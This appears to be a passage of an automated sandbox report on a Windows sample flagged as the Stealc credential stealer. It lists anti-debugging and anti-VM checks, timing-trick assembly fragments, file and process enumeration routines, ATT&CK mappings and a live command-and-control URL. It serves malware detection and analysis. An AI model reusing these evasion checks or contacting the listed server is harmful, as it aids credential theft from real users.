              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0036F second address: 4C00375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C003DC second address: 4C0040B instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007FB560E14C43h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f mov bl, 2Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB560E14C3Eh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0040B second address: 4C0040F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0040F second address: 4C00426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB560E14C3Dh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C00426 second address: 4C0044C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB560CBB801h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB560CBB7FDh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0D73 second address: 4A0D8A instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB560E14C38h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FB560E14C36h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0D8A second address: 4A0D94 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB560CBB7F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0D94 second address: 4A0D9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0D9A second address: 4A0D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2EFC06 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 4BAB6F instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 52879C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27083
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-27156
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_000B18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000B3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_000BE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000B1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000B1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000B4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_000B4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000ADB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000ADB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000ADB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000ADB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_000B2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000B23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_000B23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_000BCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_000BDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000BD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_000BD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_000A16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_000A16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_000C1BF0
              Source: file.exe, file.exe, 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2179287907.0000000000EC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWM|
              Source: file.exe, 00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2179287907.0000000000EC3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2179287907.0000000000E92000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25895
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25759
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25741
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25888
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25908
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000A4A60 VirtualProtect 00000000,00000004,00000100,?0_2_000A4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000C6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C6390 mov eax, dword ptr fs:[00000030h]0_2_000C6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_000C2A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3668, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_000C4610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_000C46A0
              Source: file.exe, file.exe, 00000000.00000002.2178694219.0000000000476000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_000C2D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C1B20 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_000C1B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_000C2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_000C2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_000C2C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2127364096.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3668, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2178508766.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2127364096.0000000004A60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3668, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
              Security Software Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
              Disable or Modify Tools              		Security Account Manager33
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS13
              Process Discovery              		Distributed Component Object ModelInput Capture12
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information              		LSA Secrets1
              Account Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information              		Cached Domain Credentials1
              System Owner/User Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
              Software Packing              		DCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading              		Proc Filesystem324
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0017.t-0009.t-msedge.net
              		13.107.246.45
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/c4becf79229cb002.phpfalse
                  		high
                  http://185.215.113.206/false
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/c4becf79229cb002.phplfile.exe, 00000000.00000002.2179287907.0000000000E92000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206file.exe, 00000000.00000002.2179287907.0000000000E4E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206/;file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.206/c4becf79229cb002.phpTfile.exe, 00000000.00000002.2179287907.0000000000E92000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://185.215.113.206/)file.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://185.215.113.206/c4becf79229cb002.phpvfile.exe, 00000000.00000002.2179287907.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.215.113.206
                                  		unknownPortugal
                                  		206894WHOLESALECONNECTIONSNLtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1559918
                                  Start date and time:2024-11-21 06:22:08 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 3m 17s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:2
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:file.exe
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                                  EGA Information:
                                  • Successful, ratio: 100%
                                  HCA Information:
                                  • Successful, ratio: 80%
                                  • Number of executed functions: 19
                                  • Number of non-executed functions: 121
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe
                                  • Stop behavior analysis, all processes terminated

                                  Warnings

